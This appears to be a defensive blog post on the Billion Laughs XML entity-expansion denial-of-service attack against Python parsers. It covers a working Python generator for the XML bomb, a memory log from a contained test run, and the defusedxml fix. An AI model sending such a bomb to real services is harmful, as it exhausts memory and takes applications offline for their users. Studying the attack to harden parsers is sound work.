Python DoS Prevention: The Billion Laughs Attack

What is a “Billion Laughs” attack, and how can you protect your Python applications?

What is DoS?

Before we dig into the “Billion Laughs” attack or how to protect your applications, let me give a quick overview of what DoS is. DoS stands for denial-of-service, a general class of attacks designed to restrict the availability of an application, service, or company. DoS attacks are fascinating in part because of the huge variability in how they’re executed. I won’t go into much detail here, but a few historic examples come up below.

DoS attacks generally fall into one of two broad classes: single-source Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS). Both share the same general intent, but they take very different forms.

DoS

DoS attacks are perpetrated by a single attacker whose goal is to make an application, service, or machine unavailable, either by flooding it with more requests than it can handle or by consuming resources or processing in such a way that legitimate requests cannot be handled. Within DoS there are two primary categories: Application attacks and Network attacks.

Network attacks, regardless of how they’re executed, generally aim to saturate bandwidth or overwhelm a server by brute force or a flood of malformed requests. DoS Network attacks aren’t too common anymore due to basic firewall configuration and the ability of servers to handle traffic from a single malicious client.

Application layer attacks, also sometimes called Layer 7 attacks, put operational strain on the software serving the requests so that it cannot handle additional requests. This is the category the Billion Laughs attack belongs to.

DDoS

DDoS attacks are denial-of-service attacks in which more than one attacking machine participates. With the rising prevalence of IoT botnets, DDoS attacks are on the upswing.

DDoS attacks appear to be ramping up in terms of magnitude, if not also frequency. The proliferation of IoT devices with poor security controls has led to massive botnets such as Mirai. The controllers of these botnets can rent them out to other malicious actors to power massive DDoS attacks, such as the one against Dyn that crippled large parts of the internet in 2016.

DDoS attacks can also be perpetrated by large groups of active users using simple tools, as in the DDoS attack by Anonymous against a number of financial institutions in 2010, following their refusal to process payments for “News” site WikiLeaks.

A Billion Laughs

The Billion Laughs attack is an Application DoS attack aimed at document parsers, typically XML or YAML. It may also be referred to as an XML Bomb. The attack works by having a single base element that refers to an entity, which in turn refers to 10 additional entities, each of which refers to 10 more entities, and so on until it ends with a terminating entity that doesn’t refer to any further entities. When parsed, this small XML document is inflated to include a very large number of copies of the terminating entity. The name “Billion Laughs” comes from the tendency to use “lol” as the entity name, so a fully inflated document would contain a billion “lol”s.
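The structure described above can be sketched in a few lines of Python. This is a hypothetical generator, not the exact file used in this post: the function names, the lolz root element, and the lol0 through lol9 entity names are assumptions for illustration. It builds the document as a string and works out the expanded size arithmetically, so the full-size bomb is never parsed. Only a tiny variant (3 references per level, 2 levels) is actually expanded to show the mechanism.

```python
import xml.etree.ElementTree as ET


def build_entity_bomb(levels: int = 9, fanout: int = 10, payload: str = "lol") -> str:
    """Return an XML document whose nested entities expand to fanout**levels payloads."""
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE lolz [",
        f'  <!ENTITY lol0 "{payload}">',  # terminating entity: refers to nothing else
    ]
    for level in range(1, levels + 1):
        # Each entity refers `fanout` times to the entity one level below it.
        refs = f"&lol{level - 1};" * fanout
        lines.append(f'  <!ENTITY lol{level} "{refs}">')
    lines += ["]>", f"<lolz>&lol{levels};</lolz>"]
    return "\n".join(lines)


def expanded_size(levels: int = 9, fanout: int = 10, payload: str = "lol") -> int:
    """Characters of text a parser would have to hold after full expansion."""
    return len(payload) * fanout ** levels


# Build the full-size document as text only; it is never handed to a parser.
bomb = build_entity_bomb()
print(f"document size: {len(bomb)} characters")
print(f"expanded size: {expanded_size():,} characters")

# Harmless demonstration: 3 references per level, 2 levels -> 9 copies of "lol".
tiny = ET.fromstring(build_entity_bomb(levels=2, fanout=3))
print(tiny.text)
```

With the defaults, the document stays under a kilobyte while the expansion is 3 × 10^9 characters (a billion copies of a three-character string), which lines up with the multi-gigabyte memory use discussed in this post.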

If you attempt to parse this file using the standard library’s xml.etree.ElementTree, the attack is triggered and this ~800 byte XML file results in ~3 GB of memory being used to parse it. For this reason I decided to run the experiment in a Docker container, with a 1 GB memory limit set in Docker for Mac. My test run script attempts to parse the file using Python in the background and logs the memory usage every second. It only takes about 10 seconds before the process is killed. You can view my setup files here.

$ docker build . -t vulnerable && docker run vulnerable

...

Using: 7788 Kb

Using: 230172 Kb

Using: 502340 Kb

Using: 779064 Kb

Using: 956980 Kb

Using: 1102780 Kb

Using: 1252228 Kb

Using: 1389968 Kb

Using: 1515664 Kb

Using: 1692576 Kb

./run.sh: line 13: 6 Killed python vulnerable.py
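The run script itself is not reproduced here, but the approach described above (start the parser in the background, then log its memory use once per second) could look roughly like this in Python. Everything in this sketch is an assumption: the function names are hypothetical, and it reads VmRSS from /proc, so it only reports numbers on Linux, which is what runs inside the container.

```python
import subprocess
import time
from pathlib import Path
from typing import List, Optional


def parse_rss_kb(status_text: str) -> Optional[int]:
    """Extract the resident set size (in kB) from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("VmRSS:"):
            return int(line.split()[1])
    return None


def monitor(cmd: List[str], interval: float = 1.0) -> int:
    """Run cmd as a child process and log its memory use until it exits."""
    proc = subprocess.Popen(cmd)
    while proc.poll() is None:
        try:
            status = Path(f"/proc/{proc.pid}/status").read_text()
            rss = parse_rss_kb(status)
        except OSError:
            rss = None  # process already gone, or /proc is unavailable
        if rss is not None:
            print(f"Using: {rss} Kb")
        time.sleep(interval)
    return proc.returncode


# Example (assumes a vulnerable.py script in the working directory):
#   monitor([sys.executable, "vulnerable.py"])
```

On POSIX systems a negative return code means the child was terminated by a signal, which is what happens when the container's memory limit is hit and the process is killed.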

Protection

The library defusedxml was created solely for this purpose. The Billion Laughs attack is only one of several forms of XML bomb, and defusedxml is built to handle all of them. It is designed as a safe drop-in replacement for the standard xml library’s functionality.

Where you would normally do the following to parse an XML file:

from xml.etree.ElementTree import parse
et = parse(<xml>)  # <xml> is a placeholder for a file path or file object

you can change it to this to protect yourself from XML bombs in your Python applications:

from defusedxml.ElementTree import parse
et = parse(<xml>)  # same call, but entity declarations are now rejected
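With defusedxml in place, an entity bomb is rejected rather than expanded. The sketch below assumes defusedxml is installed from PyPI. The helper name parse_untrusted is hypothetical, and returning None on rejection is just one possible policy. EntitiesForbidden is the exception defusedxml raises when a document declares entities.

```python
from typing import Optional
from xml.etree.ElementTree import Element


def parse_untrusted(xml_text: str) -> Optional[Element]:
    """Parse XML from an untrusted source; return None if it declares entities."""
    # Third-party dependency (pip install defusedxml), imported here so the
    # requirement is explicit at the point of use.
    from defusedxml import EntitiesForbidden
    from defusedxml.ElementTree import fromstring

    try:
        return fromstring(xml_text)
    except EntitiesForbidden:
        # The document contains <!ENTITY ...> declarations: refuse it.
        return None


# A scaled-down document with the same shape as a Billion Laughs payload.
SUSPICIOUS = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;">
]>
<lolz>&lol1;</lolz>"""
```

Calling parse_untrusted(SUSPICIOUS) should return None, while an ordinary document such as "<a>hi</a>" parses as usual. Malformed XML still raises a parse error, which a real application would want to handle separately.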

Conclusion

As you can see, preventing XML bomb attacks in Python is trivial, low-hanging fruit for improving your application’s security. Unfortunately there’s no such magic bullet for many other forms of DoS attacks, and DDoS is often a risk that can only be mitigated with a high price tag (and even then there are no guarantees). You can view all my code related to this blog here.